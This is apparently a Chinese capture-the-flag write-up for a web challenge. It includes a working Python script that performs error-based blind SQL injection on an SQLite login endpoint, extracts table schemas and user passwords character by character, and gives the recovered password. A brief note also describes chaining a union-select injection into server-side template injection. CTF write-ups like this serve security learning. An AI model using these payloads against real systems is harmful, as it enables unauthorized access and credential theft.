[Web] PYER

通过if来判断不是mysql ,ifnull看出是sqlite

sql错误会500, 报错盲注

  1. import sys
  2. import requests
  3. url='http://124.70.199.12:31534/login'
  4. 

  5. sql="select name from sqlite_master where type='table' and name!='comment' and name!='users'"
  6. sql="select sql from sqlite_master where name='users' "
  7. sql="select username from users"
  8. sql="select password from users"
  9. #sqlite_not_safe
  10. #sql="select sql from sqlite_master where name='comment' "
  11. #sql="select group_concat(password) from users "
  12. 

  13. payload="a' or abs(ifnull(nullif(1, unicode(substr(( {}),{},1))={}),0x8000000000000000)) or '0"
  14. h=''
  15. for i in range(1,10000):
  16.     for j in range(30,129):
  17. 

  18.         t=payload.format(sql,str(i),str(j))
  19.         print(t)
  20.         r=requests.post(url,data={
  21.             'username':t,
  22.             'password':'a',
  23.         })
  24.         if r.status_code==500:
  25.             h+=chr(j)
  26.             print(h)
  27.             break

密码sqlite_not_safe 登录

然后又一个sql注入, {{}}有SSTI,直接union select SSTI就行

打赏还是打残,这是个问题
[Pwn] pwn1 - cpt.shao
[Reverse] PE - Cew
立即登录, 发表评论.
没有帐号? 立即注册
0 条评论
More...